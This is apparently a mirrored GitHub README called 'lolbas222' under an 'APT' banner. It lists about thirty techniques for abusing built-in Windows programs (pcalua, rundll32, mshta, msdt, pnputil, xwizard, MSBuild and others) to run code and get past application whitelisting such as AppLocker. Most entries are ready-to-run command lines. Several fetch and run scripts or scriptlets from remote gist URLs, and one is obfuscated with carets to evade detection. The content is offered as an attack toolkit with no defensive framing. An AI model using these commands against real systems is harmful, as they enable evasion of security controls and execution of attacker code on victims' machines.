Giter Site home page Giter Site logo

lolbas222's Introduction

####################### | # | APT # | # #######################

( 1 ) Use Pcalua

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Alternate Data Streams ADS:>

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe Launcher .INF:> Note This Eveything here .INF Work on My Script INFscript Only !

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My Code INFScript Injection Command Line 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall Launch Execute INFScript

INFDefaultInstall.exe C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll Launch Execute My INFScript

setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer

&- Add Values in HKLM Name File ms-settings in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer 
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\tem32\desk.cpl"

( 7 ) Language LUA in Files .wlua

wlua.exe C:\testing.wlua
&- Hello World Exe My Code LUA
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT ScriptLet Execution in My INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code 
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) Jscript Execute Code Via ( Eval,VSA,)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

 msiexec.exe /passive /i C:\testing.msi /norestart 
 &- File MSI Hello World Exe in .MSI

( 10v1 ) COM Component object Model Hijacking

&- Add Reg in System 
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now Execution invoke-CLSID Via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript Via mshta.exe

&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe Execution Endless

forfiles.exe /c calc.exe

( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe Execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe Execute EXE-MSI Via Reader XML wtih Launch by Pcwrun.exe

 msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 &- link file PCW8E57.xml
 https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch MSI Pacakge Execution Powershell

install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL Execute CML Launch Application

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI Execute Using OpenWith.exe

Whitelisting SRP Bypassing Using OpenWith.exe To Launch HTA/MSI Execution 
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML Digital License (.xrm-ms) ActiveX

iexplorer C:\test.xrm-ms 
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3

( 10v12 )

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10 v13 ) ActiveX executing using a SVG Document

iexplorer C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

(10v14) Dxcap.exe Abuse

Dxcap.exe -c C:\Windows\System32\notepad.exe

(Note) Product Via @bohops ( 11 ) HTA Launch Execution ( url.dll )

Rundll32.exe url.dll,OpenURL FileHTA Or Anything

( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,

( 13 ) XML Launch Execution Via Reflection,Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('http://Microsoft.Build '); $e=new-object http://Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();

( 15 ) SCT Execution Via INFScript By ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) XML Launch Execution Via Reader XML,Transform Object Powershell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.VisualBasic )

 [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)

( 18 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.JScript )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) Commandline APT Launch Execution Applocker/Bypassing Via ( CL_LoadAssembly )

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) HTA Launch Execution Via ( shdocvw.dll )

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) HTA Launch Execution Via ( ieframe.dll )

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Commandline Execute Via Vshadow.exe

 Vshadow exec calc.exe

( 23 ) CSharp Execution Via ProjectInstance RA Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()

lolbas222's People

Contributors

homjxi0e avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar

Forkers

riviera12345 analyticsearch minkione secfb linuxdemo zhutougg suckthegithub blackcode-writer hackinglz dm2333 arryboom a-min3 zief du0l goudan2333 codes24 m00zh33 shantanu561993 dannymas makakin b1gw00d zaza6677 hello-xbugs c0010 zzage dash1b guhuisec sasqwatch fate93930 raystyle imulmul xinyuweb theg1ft josexv1 skybulk llxiaoyuan inotgreen uiwp0 bitian

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.